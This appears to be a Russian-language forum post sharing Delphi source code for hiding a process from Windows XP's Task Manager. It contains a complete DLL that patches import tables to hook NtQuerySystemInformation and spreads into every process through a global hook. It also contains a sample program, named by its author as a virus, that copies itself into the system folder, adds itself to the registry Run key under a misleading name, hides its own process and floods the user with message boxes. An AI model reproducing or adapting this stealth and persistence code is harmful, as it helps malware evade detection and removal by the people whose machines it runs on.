[Delphi] Скрытие процесса в Windows XP

[IBM]

Сразу скажу, что DLL не моя. Я лишь написал пример. как это использовать.


DLL:

Код:

library Sys;

uses
  Windows,
  TlHelp32;
type
SYSTEM_INFORMATION_CLASS = (
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
);
_IMAGE_IMPORT_DESCRIPTOR = packed record
case Integer of 0:(
Characteristics: DWORD);
1:(
OriginalFirstThunk:DWORD;
TimeDateStamp:DWORD;
ForwarderChain: DWORD;
Name: DWORD;
FirstThunk: DWORD);
end;
IMAGE_IMPORT_DESCRIPTOR=_IMAGE_IMPORT_DESCRIPTOR;
PIMAGE_IMPORT_DESCRIPTOR=^IMAGE_IMPORT_DESCRIPTOR;

PFARPROC=^FARPROC;


const ImagehlpLib = 'IMAGEHLP.DLL';

function ImageDirectoryEntryToData(Base: Pointer; MappedAsImage: ByteBool;
DirectoryEntry: Word; var Size: ULONG): Pointer; stdcall; external ImagehlpLib name 'ImageDirectoryEntryToData';

function AllocMem(Size: Cardinal): Pointer;
begin
 GetMem(Result, Size);
 FillChar(Result^, Size, 0);
end;


procedure ReplaceIATEntryInOneMod(pszCallerModName:Pchar;pfnCurrent:FarProc;pfnNew:FARPROC;hmodCaller:hModule);
var ulSize:ULONG; pImportDesc:PIMAGE_IMPORT_DESCRIPTOR;pszModName:PChar;
    pThunk:PDWORD; ppfn:PFARPROC;ffound:LongBool;written:DWORD;
begin
 pImportDesc := ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize);
 if pImportDesc = nil then exit;
 while pImportDesc.Name<>0 do
  begin
   pszModName := PChar(hmodCaller + pImportDesc.Name);
   if (lstrcmpiA(pszModName, pszCallerModName) = 0) then break;
   Inc(pImportDesc);
  end;
 if (pImportDesc.Name = 0) then exit;
 pThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk);
 while pThunk^<>0 do
  begin
   ppfn := PFARPROC(pThunk);
   fFound := (ppfn^ = pfnCurrent);
   if (fFound) then
    begin
     VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written);
     WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written);
     exit;
    end;
   Inc(pThunk);
  end;
end;

var
 addr_NtQuerySystemInformation:Pointer;
 mypid:DWORD;
 fname:PCHAR;
 mapaddr:PDWORD;
 hideOnlyTaskMan:PBOOL;
 PIDS:array of integer;

function myNtQuerySystemInfo(SystemInformationClass:SYSTEM_INFORMATION_CLASS;SystemInformation:Pointer;
         SystemInformationLength:ULONG;ReturnLength:PULONG):LongInt;stdcall;
label onceagain,getnextpidstruct,quit,fillzero;
asm
  push ReturnLength
  push SystemInformationLength
  push SystemInformation
  push dword ptr SystemInformationClass
  call dword ptr [addr_NtQuerySystemInformation]
  or eax,eax
  jl quit
  cmp SystemInformationClass,SystemProcessesAndThreadsInformation
  jne quit
  onceagain:

  mov esi,SystemInformation

  getnextpidstruct:

  mov ebx,esi

  cmp dword ptr [esi],0

  je quit

  add esi,[esi]

  mov ecx,[esi+44h]

  cmp ecx,mypid

  jne getnextpidstruct

  mov edx,[esi]

  test edx,edx

  je fillzero

  add [ebx],edx

  jmp onceagain

  fillzero:

  and [ebx],edx

  jmp onceagain

  quit:

  mov Result,eax

end;





procedure InterceptFunctions;

var hSnapShot:THandle;me32:MODULEENTRY32;

begin

 addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');

 hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);

 if hSnapshot=INVALID_HANDLE_VALUE then exit;

 try

  ZeroMemory(@me32,sizeof(MODULEENTRY32));

  me32.dwSize:=sizeof(MODULEENTRY32);

  Module32First(hSnapShot,me32);

  repeat

   ReplaceIATEntryInOneMod('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule);

  until not Module32Next(hSnapShot,me32);

 finally

  CloseHandle(hSnapShot);

 end;

end;



procedure UninterceptFunctions;

var hSnapShot:THandle;me32:MODULEENTRY32;

begin

 addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');

 hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);

 if hSnapshot=INVALID_HANDLE_VALUE then exit;

 try

  ZeroMemory(@me32,sizeof(MODULEENTRY32));

  me32.dwSize:=sizeof(MODULEENTRY32);

  Module32First(hSnapShot,me32);

  repeat

   ReplaceIATEntryInOneMod('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule);

  until not Module32Next(hSnapShot,me32);

 finally

  CloseHandle(hSnapShot);

 end;

end;





var HookHandle: THandle;



function CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall;

begin

 Result:=0;

end;



procedure InstallHook; stdcall;

begin

 HookHandle:=SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0);

end;



var hFirstMapHandle:THandle;



function HideProcess(pid:DWORD;HideOnlyFromTaskManager:BOOL):BOOL;stdcall;

var addrMap:PDWORD;ptr2:PBOOL;

begin

 mypid:=0;

 result:=false;

 hFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping');

 if hFirstMapHandle=0 then exit;

 addrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8);

 if addrMap=nil then

 begin

  CloseHandle(hFirstMapHandle);

  exit;

 end;

 addrMap^:=pid;

 ptr2:=PBOOL(DWORD(addrMap)+4);

 ptr2^:=HideOnlyFromTaskManager;

 UnmapViewOfFile(addrMap);

 InstallHook;

 result:=true;

end;





exports

 HideProcess;



var

 hmap:THandle;



procedure LibraryProc(Reason: Integer);

begin

 if Reason=DLL_PROCESS_DETACH then

 if mypid>0 then

  UninterceptFunctions() else

 CloseHandle(hFirstMapHandle);

end;





begin

 hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');

 if hmap=0 then exit;

 try

  mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);

  if mapaddr=nil then exit;

  mypid:=mapaddr^;

  hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);

  if hideOnlyTaskMan^ then

   begin

    fname:=allocMem(MAX_PATH+1);

    GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);

    // if not (ExtractFileName(fname)='taskmgr.exe') then exit;

   end;

   InterceptFunctions;

 finally

  UnmapViewOfFile(mapaddr);

  CloseHandle(Hmap);

  DLLProc:=@LibraryProc;

 end;

end.

Использование:

Код:

program Project2;

uses
  TLHelp32, ShellApi, Registry, Windows, SysUtils;

const
  VirusFileName='clsptr.exe';

function HideProcess(pid:DWORD;HideOnlyFromTaskManager:BOOL):BOOL; stdcall; external 'Sys.dll';

Function ProcCheck(FileProcessName:Pansichar) : Boolean;
 var
 Snap: dword;
 Process: TPROCESSENTRY32;
begin
  Snap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if snap<>INVALID_HANDLE_VALUE then
    begin
    Process.dwSize:=SizeOf(TPROCESSENTRY32);
    repeat
          if lstrcmp(Process.szExeFile,FileProcessName)=0 then
              begin
              ProcCheck:=True;
              end;
    until not Process32Next(Snap, Process);
    end;
end;
Function GetPID(ProcName:string) : integer;
 var
  hSnap:THandle;
  pe:TProcessEntry32;
  pid: DWORD;
begin
 pe.dwSize:=SizeOf(pe);
 hSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  If Process32First(hSnap,pe) then
    While Process32Next(hSnap,pe) do
      if ExtractFileName(pe.szExeFile)=ProcName then
        result:=pe.th32ProcessID;
end;
var
  Sys, Joke:Array[0..255] of char;
  tmp:string;
  reg:Tregistry;
begin
  GetModuleFileName(0, Joke, sizeof(Joke));
  GetSystemDirectory(Sys, sizeof(Sys));
  if ExtractFileName(Joke)=VirusFileName then
    begin
      HideProcess(GetPID(VirusFileName), true);
      while 1<>2 do
        begin
          MessageBox(0, 'Hey, find me if you can', 'Find Me!!', MB_OK);
          sleep(10000);
        end;
    end
      else
        begin
          tmp:='\'+VirusFileName;
          tmp:=Sys+tmp;
          CopyFile(Joke, PChar(tmp), false);
          Reg:=Tregistry.create;
          Reg.Rootkey:=HKEY_CURRENT_USER;
          Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', true);
          Reg.WriteString('SystemService', tmp);
          Reg.CloseKey;
          IF FileExists('Sys.dll') then CopyFile('Sys.dll', PChar(Sys+'\Sys.dll'), false) else MessageBox(0, 'Sys.dll not found, try to reinstall programm', 'Error', MB_OK);
          ShellExecute(0, 'open', VirusFileName, nil, Sys, SW_SHOW);
        end;
end.

Программа кидает себя на автозапуск, копируется в папку винды, скрывает свой процесс в диспетчере задач и начинает флудить сообщением "Hey, find me if you can"




Работает только в XP ;(

Sorry, под Windows 7,8, vista вообще рабочего примера не нашел